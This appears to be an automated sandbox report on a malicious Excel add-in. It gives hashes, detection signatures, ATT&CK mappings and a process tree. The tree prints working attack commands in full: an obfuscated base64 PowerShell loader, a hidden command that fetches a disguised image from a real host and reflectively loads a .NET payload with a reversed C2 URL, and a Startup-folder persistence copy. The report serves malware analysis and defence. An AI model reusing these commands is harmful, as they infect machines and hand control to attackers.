4de715cc8efe759c913068845833cf69bc46e3ab96ce6ee9a005468638b4415a

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
26/08/2023, 14:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4de715cc8efe759c913068845833cf69bc46e3ab96ce6ee9a005468638b4415a_JC.xlam
Size

599KB
MD5

f383adacdac479322a5c37c90edf8162
SHA1

d3bf7075832e55aabe76f5256d58bb45f18f9704
SHA256

4de715cc8efe759c913068845833cf69bc46e3ab96ce6ee9a005468638b4415a
SHA512

0f73a5b978e3f27a43abd1bb2a3bc6a9ae04a11c5ac98ed180c60f31416080a49f0c0d194eb0bc14c0db9585e382cd4e7e471647bbc62a9d9e6ff570bebae481
SSDEEP

12288:EEnW3raLk/10xzHtsYpjRLh4Oj0zkRaFwGy5OQPF5EGfeKLRh:NZXFOYpjh+I0gR/MQP3Jfeo

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

exe.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	484	EQNEDT32.EXE
6	1380	powershell.exe
8	1380	powershell.exe
10	1380	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ GU.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ GU.vbs	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
484	EQNEDT32.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2416	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1908	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2680	powershell.exe
808	powershell.exe
1380	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1908	EXCEL.EXE
1908	EXCEL.EXE
1908	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 484 wrote to memory of 2904	484	EQNEDT32.EXE	29
PID 484 wrote to memory of 2904	484	EQNEDT32.EXE	29
PID 484 wrote to memory of 2904	484	EQNEDT32.EXE	29
PID 484 wrote to memory of 2904	484	EQNEDT32.EXE	29
PID 2904 wrote to memory of 2100	2904	WScript.exe	31
PID 2904 wrote to memory of 2100	2904	WScript.exe	31
PID 2904 wrote to memory of 2100	2904	WScript.exe	31
PID 2904 wrote to memory of 2100	2904	WScript.exe	31
PID 2100 wrote to memory of 2416	2100	cmd.exe	33
PID 2100 wrote to memory of 2416	2100	cmd.exe	33
PID 2100 wrote to memory of 2416	2100	cmd.exe	33
PID 2100 wrote to memory of 2416	2100	cmd.exe	33
PID 2100 wrote to memory of 2684	2100	cmd.exe	34
PID 2100 wrote to memory of 2684	2100	cmd.exe	34
PID 2100 wrote to memory of 2684	2100	cmd.exe	34
PID 2100 wrote to memory of 2684	2100	cmd.exe	34
PID 2684 wrote to memory of 2680	2684	cmd.exe	35
PID 2684 wrote to memory of 2680	2684	cmd.exe	35
PID 2684 wrote to memory of 2680	2684	cmd.exe	35
PID 2684 wrote to memory of 2680	2684	cmd.exe	35
PID 2904 wrote to memory of 808	2904	WScript.exe	36
PID 2904 wrote to memory of 808	2904	WScript.exe	36
PID 2904 wrote to memory of 808	2904	WScript.exe	36
PID 2904 wrote to memory of 808	2904	WScript.exe	36
PID 808 wrote to memory of 1380	808	powershell.exe	38
PID 808 wrote to memory of 1380	808	powershell.exe	38
PID 808 wrote to memory of 1380	808	powershell.exe	38
PID 808 wrote to memory of 1380	808	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4de715cc8efe759c913068845833cf69bc46e3ab96ce6ee9a005468638b4415a_JC.xlam
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:484
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YUI.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\YUI.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ GU.vbs')"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2100
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 5
      4⤵
      Runs ping.exe
      PID:2416
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\YUI.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ GU.vbs')"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\YUI.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ GU.vbs')
        5⤵
        Drops startup file
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DY⁂⇵Mw⁂⇵v⁂⇵DY⁂⇵Mg⁂⇵x⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵dQBu⁂⇵Gk⁂⇵dgBl⁂⇵HI⁂⇵cwBv⁂⇵F8⁂⇵dgBi⁂⇵HM⁂⇵LgBq⁂⇵H⁂⇵⁂⇵ZQBn⁂⇵D8⁂⇵MQ⁂⇵2⁂⇵Dk⁂⇵M⁂⇵⁂⇵5⁂⇵DM⁂⇵MQ⁂⇵4⁂⇵DU⁂⇵NQ⁂⇵n⁂⇵Ds⁂⇵J⁂⇵B3⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵BO⁂⇵GU⁂⇵dw⁂⇵t⁂⇵E8⁂⇵YgBq⁂⇵GU⁂⇵YwB0⁂⇵C⁂⇵⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBO⁂⇵GU⁂⇵d⁂⇵⁂⇵u⁂⇵Fc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵LgBE⁂⇵G8⁂⇵dwBu⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵R⁂⇵Bh⁂⇵HQ⁂⇵YQ⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FU⁂⇵cgBs⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵RQBu⁂⇵GM⁂⇵bwBk⁂⇵Gk⁂⇵bgBn⁂⇵F0⁂⇵Og⁂⇵6⁂⇵FU⁂⇵V⁂⇵BG⁂⇵Dg⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BT⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵FM⁂⇵V⁂⇵BB⁂⇵FI⁂⇵V⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵EU⁂⇵TgBE⁂⇵D4⁂⇵Pg⁂⇵n⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵BP⁂⇵GY⁂⇵K⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwBl⁂⇵C⁂⇵⁂⇵M⁂⇵⁂⇵g⁂⇵C0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwB0⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵Kw⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵u⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵I⁂⇵⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵Ow⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵FM⁂⇵dQBi⁂⇵HM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Cw⁂⇵I⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBD⁂⇵G8⁂⇵bgB2⁂⇵GU⁂⇵cgB0⁂⇵F0⁂⇵Og⁂⇵6⁂⇵EY⁂⇵cgBv⁂⇵G0⁂⇵QgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBS⁂⇵GU⁂⇵ZgBs⁂⇵GU⁂⇵YwB0⁂⇵Gk⁂⇵bwBu⁂⇵C4⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵F0⁂⇵Og⁂⇵6⁂⇵Ew⁂⇵bwBh⁂⇵GQ⁂⇵K⁂⇵⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HQ⁂⇵eQBw⁂⇵GU⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bs⁂⇵G8⁂⇵YQBk⁂⇵GU⁂⇵Z⁂⇵BB⁂⇵HM⁂⇵cwBl⁂⇵G0⁂⇵YgBs⁂⇵Hk⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BU⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵Cg⁂⇵JwBG⁂⇵Gk⁂⇵YgBl⁂⇵HI⁂⇵LgBI⁂⇵G8⁂⇵bQBl⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵bQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵TQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵K⁂⇵⁂⇵n⁂⇵FY⁂⇵QQBJ⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵L⁂⇵⁂⇵o⁂⇵Cc⁂⇵d⁂⇵B4⁂⇵HQ⁂⇵Lg⁂⇵y⁂⇵DQ⁂⇵MwBn⁂⇵Gs⁂⇵LwBs⁂⇵HQ⁂⇵Lw⁂⇵3⁂⇵DY⁂⇵MQ⁂⇵u⁂⇵DE⁂⇵Ng⁂⇵x⁂⇵C4⁂⇵Ng⁂⇵1⁂⇵DE⁂⇵Lg⁂⇵0⁂⇵Dk⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.243gk/lt/761.161.651.49//:ptth');$method.Invoke($null, $arguments)"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
c985b8fa4d1d298112d08fa2919067c9

SHA1
d8ce2b586f7ff68ff155c063f91ef0f8dcab1826

SHA256
7b0738c0d9f03e8c4a14387c3efcadf57402131a5a3e228b87c2d6f70518bb75

SHA512
8c28012a018c5d3df796f81a990bfbdb06facef20fe1b09db84f2135365c3c9632c7f2f72b2dbac09c495889b9c75c75754218b87d2886a6a5b2beed9c4d8dbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC007.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC155.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XG7LZACDWDQYISB1FX6W.temp

Filesize
7KB

MD5
832559369ce2b0ca01bf0e3908de32b7

SHA1
9b9b82b5a511b3ebf121a6f9e17d725168e21442

SHA256
4f9472dfbd521492137eb12d3ce5c0eb002cf0c9f0069298d417bc85dfb67b17

SHA512
7352f1adf458d150a3665a2f2061d3e9d1cf15b96b51b1e9d6d6f571e2745b05db21f426b7ff05aa0530c8852fbf7d26390842f66bef3e21c1112fa98fe42939

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
832559369ce2b0ca01bf0e3908de32b7

SHA1
9b9b82b5a511b3ebf121a6f9e17d725168e21442

SHA256
4f9472dfbd521492137eb12d3ce5c0eb002cf0c9f0069298d417bc85dfb67b17

SHA512
7352f1adf458d150a3665a2f2061d3e9d1cf15b96b51b1e9d6d6f571e2745b05db21f426b7ff05aa0530c8852fbf7d26390842f66bef3e21c1112fa98fe42939

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
832559369ce2b0ca01bf0e3908de32b7

SHA1
9b9b82b5a511b3ebf121a6f9e17d725168e21442

SHA256
4f9472dfbd521492137eb12d3ce5c0eb002cf0c9f0069298d417bc85dfb67b17

SHA512
7352f1adf458d150a3665a2f2061d3e9d1cf15b96b51b1e9d6d6f571e2745b05db21f426b7ff05aa0530c8852fbf7d26390842f66bef3e21c1112fa98fe42939

Download Submit
C:\Users\Admin\AppData\Roaming\YUI.vbs

Filesize
310KB

MD5
f9973c901211c03dca6cce7bea8a2765

SHA1
77c603029b203b52769fa382032f171ecc70b9ba

SHA256
1bf9e3170b81ef16660ea29f7198657e27a1e9e295ef3d23d9974a8ce66decdb

SHA512
9a283d0c180cfdc4833b2e76805172789cdc28630e058f0bfef0ac78a685bd39d80e5b1f078094d164a4151a1770b8b2d59b7fe8f811af36e634c15c1b05cc80

Download Submit
memory/808-99-0x000000006C330000-0x000000006C8DB000-memory.dmp

Filesize
5.7MB

Download
memory/808-22-0x0000000002860000-0x00000000028A0000-memory.dmp

Filesize
256KB

Download
memory/808-24-0x000000006C330000-0x000000006C8DB000-memory.dmp

Filesize
5.7MB

Download
memory/808-20-0x000000006C330000-0x000000006C8DB000-memory.dmp

Filesize
5.7MB

Download
memory/808-21-0x0000000002860000-0x00000000028A0000-memory.dmp

Filesize
256KB

Download
memory/808-23-0x0000000002860000-0x00000000028A0000-memory.dmp

Filesize
256KB

Download
memory/1380-31-0x000000006C330000-0x000000006C8DB000-memory.dmp

Filesize
5.7MB

Download
memory/1380-30-0x000000006C330000-0x000000006C8DB000-memory.dmp

Filesize
5.7MB

Download
memory/1380-98-0x000000006C330000-0x000000006C8DB000-memory.dmp

Filesize
5.7MB

Download
memory/1908-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1908-11-0x0000000073CDD000-0x0000000073CE8000-memory.dmp

Filesize
44KB

Download
memory/1908-1-0x0000000073CDD000-0x0000000073CE8000-memory.dmp

Filesize
44KB

Download
memory/1908-101-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1908-102-0x0000000073CDD000-0x0000000073CE8000-memory.dmp

Filesize
44KB

Download
memory/2680-14-0x000000006C210000-0x000000006C7BB000-memory.dmp

Filesize
5.7MB

Download
memory/2680-12-0x0000000002410000-0x0000000002450000-memory.dmp

Filesize
256KB

Download
memory/2680-10-0x0000000002410000-0x0000000002450000-memory.dmp

Filesize
256KB

Download
memory/2680-9-0x000000006C210000-0x000000006C7BB000-memory.dmp

Filesize
5.7MB

Download
memory/2680-8-0x000000006C210000-0x000000006C7BB000-memory.dmp

Filesize
5.7MB

Download